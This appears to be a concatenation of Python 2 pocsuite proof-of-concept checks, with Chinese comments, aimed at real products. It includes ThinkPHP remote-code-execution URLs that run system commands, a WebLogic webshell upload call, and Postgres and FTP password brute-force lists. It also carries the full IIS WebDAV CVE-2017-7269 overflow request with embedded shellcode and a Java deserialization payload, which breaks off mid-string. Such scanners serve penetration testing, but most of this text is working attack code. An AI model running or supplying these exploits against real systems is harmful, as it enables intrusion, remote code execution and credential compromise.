def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = '5984' #检测漏洞 url = 'http://%s:%s/_config/' % (_host, _port) try: req_code = req.get(url, timeout=5, allow_redirects=True, verify=False).status_code # print req_code if req_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = url except Exception as e: # return host print e pass print '[+]26 poc done' return self.save_output(result)
def _verify(self): result = {} vul_url = '%s' % self.url import re import time import ftplib from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = 22 #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) except Exception: return self.save_output(result) sk.close() resulta = checkUsername("rootasdf23", _host) if (resulta == "1"): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8") return self.save_output(result)
def _verify(self): # 调用指纹方法 result = {} #如果设置端口则取端口,没有设置则为默认端口 import re vul_url = "%s" % self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "7001" vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port) try: response = req.get(url=vul_ip, timeout=5, allow_redirects=False) #禁止重定向 if (response.status_code == 200 and "WSDL" in response.text): url = "/ws_utc/resources/setting/keystore" target = "http://%s:%s/" % (_host, _port) response = upload_webshell(target, url) if (response != ""): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = response return self.save_output(result) except Exception as e: print e pass return self.save_output(result)
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = 443 #s = socket.socket() #socket.setdefaulttimeout(1) #检测漏洞 try: ret = ssltest(_host, _port) # print ret if ret == "check": result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = host result['VerifyInfo']['Payload'] = payload else: pass except: pass print '[+]20 poc done' return self.save_output(result)
def _verify(self): # 调用指纹方法 result={} #如果设置端口则取端口,没有设置则为默认端口 import re import socket import time vul_url = "%s"%self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = int(url2ip(vul_url)[1]) else : _host = url2ip(vul_url) _port = 80 #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host,_port)) #print 'Server port is OK!' except Exception: return self.save_output(result) sk.close() vul_ip = "http://%s:%s/" % (_host, _port) payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222", "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222", "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222", "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"] payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls", "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir", "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"] for p in payloads2: url=vul_ip+p try: text = req.get(url,timeout=4).text if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: print e pass return self.save_output(result)
def _verify(self): import psycopg2 #调用指纹方法 result = {} passwd = [ '123456', 'admin', 'root', 'password', '123123', '123', '1', '', '{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016', '{user}2015', '{user}!', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin' ] import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', self.url) if len(_port) != 0: _host = url2ip(self.url)[0] _port = url2ip(self.url)[1] else: _host = url2ip(self.url) _port = "5432" print _host, _port import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) #print 'Server port is OK!' except Exception: print 'port not alive' return self.save_output(result) sk.close() output = Output(self) message = '' for pwd in passwd: try: pwd = pwd.replace('{user}', 'postgres') conn = psycopg2.connect(host=_host, port=_port, user='******', password=pwd) message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format( _host, pwd) print "有弱口令漏洞" conn.close() result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['Payload'] = message break except Exception as e: print e print '[+]29 poc done' return self.save_output(result)
def _verify(self): result = {} vul_url = '%s' % self.url import re import time import ftplib from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = int(url2ip(vul_url)[1]) else: _host = url2ip(vul_url) _port = 21 #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) #print 'Server port is OK!' except Exception: return self.save_output(result) sk.close() flag = False payload = "弱口令" # username = ["www","db","wwwroot","data","web","ftp","anonymous","admin","Admin","Administrator","administrator","root","ADMIN"] username = [ 'anonymous', ] password = [ "", "toor", "1234", "123456", "admin", "Admin", "ADMIN", "admin123", "Admin123", "root", "root123", "123.com" '123456', 'admin', 'root', 'password', '123123', '123', '1', '', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin' ] for u in username: for p in password: socket.setdefaulttimeout(1) ftp = ftplib.FTP() try: print u, p ftp.connect(_host, _port) ftp.login(u, p) result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = u + p return self.save_output(result) except Exception, e: ftp.close() continue
def _verify(self): # ip = self.url.split(':')[1].replace('/', '') #from api.utils import url2ip #--------------找url中 冒号后的web端口 import re _port = re.findall(':(\d+)\s*', self.url) if len(_port) != 0: _port = url2ip(self.url)[1] else: _port = 80 #------------- ip = url2ip(self.url) import socket result={} pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n' pay += 'If: <http://localhost/aaaaaaa' pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac' pay += '>' pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb' pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81' shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA' pay += shellcode pay += '>\r\n\r\n' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, _port))# ip port sock.send(pay) try: data = sock.recv(80960) except: print '连接失败' pass print '-'*18+'\n' print data print '-'*18+'\n' sock.close() if not -1 == data.find('HHIT CVE-2017-7269 Success'): message = '%s is vulnerable!' %ip + 'CVE-2017-7269 vulnerability!' print(message) result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = pay return True else: print '没有发现关键字.' return False return self.save_output(result)
def _verify(self): import socket #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "10001" #jar包头 payload_one = '\x4a\x52\x4d\x49\x00\x02\x4b\x00\x0d\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x30\x34\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x12\x70\x77\x6e\x65\x64\x39\x37\x34\x31\x30\x30\x36\x31\x34\x30\x31\x32\x33\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x72\x00\x2c\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x74\x65\x64\x43\x6c\x6f\x73\x75\x72\x65\x10\x23\x37\x19\xf7\x15\xdd\x1b\x02\x00\x01\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x70\x78\x72\x00\x2d\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x73\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x10\x23\x37\x1a\xd6\x01\xbc\x1b\x02\x00\x02\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x68\x61\x6e\x64\x6c\x65\x43\x61\x63\x68\x65\x74\x00\x28\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x3b\x70\x78\x70\x73\x72\x00\x29\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x4d\x65\x74\x68\x6f\x64\x43\x6c\x6f\x73\x75\x72\x65\x11\x0e\x3e\x84\x8f\xbd\xce\x48\x02\x00\x01\x4c\x00\x06\x6d\x65\x74\x68\x6f\x64\x71\x00\x7e\x00\x0f\x70\x78\x72\x00\x13\x67\x72\x6f\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x6f\x73\x75\x72\x65\x3c\xa0\xc7\x66\x16\x12\x6c\x5a\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\x6d\x61\x78\x69\x6d\x75\x6d\x4e\x75\x6d\x62\x65\x72\x4f\x66\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x73\x49\x00\x0f\x72\x65\x73\x6f\x6c\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4c\x00\x03\x62\x63\x77\x74\x00\x3c\x4c\x6f\x72\x67\x2f\x63\x6f\x64\x65\x68\x61\x75\x73\x2f\x67\x72\x6f\x6f\x76\x79\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x63\x61\x6c\x6c\x73\x69\x74\x65\x2f\x42\x6f\x6f\x6c\x65\x61\x6e\x43\x6c\x6f\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3b\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x71\x00\x7e\x00\x11\x4c\x00\x05\x6f\x77\x6e\x65\x72\x71\x00\x7e\x00\x11\x5b\x00\x0e\x70\x61\x72\x61\x6d\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x0a\x74\x68\x69\x73\x4f\x62\x6a\x65\x63\x74\x71\x00\x7e\x00\x11\x70\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74\x00' #import binascii #print binascii.b2a_hex(payload_one).decode('hex') #jar包尾 payload_three = '\x71\x00\x7e\x00\x19\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x76\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x76\x72\x00\x0c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x46\x69\x6c\x65\x04\x2d\xa4\x45\x0e\x0d\xe4\xff\x03\x00\x01\x4c\x00\x04\x70\x61\x74\x68\x71\x00\x7e\x00\x0f\x70\x78\x70\x70\x74\x00\x07\x65\x78\x65\x63\x75\x74\x65\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x70\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x70\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x70\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x70\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x70\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x70\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x70\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x6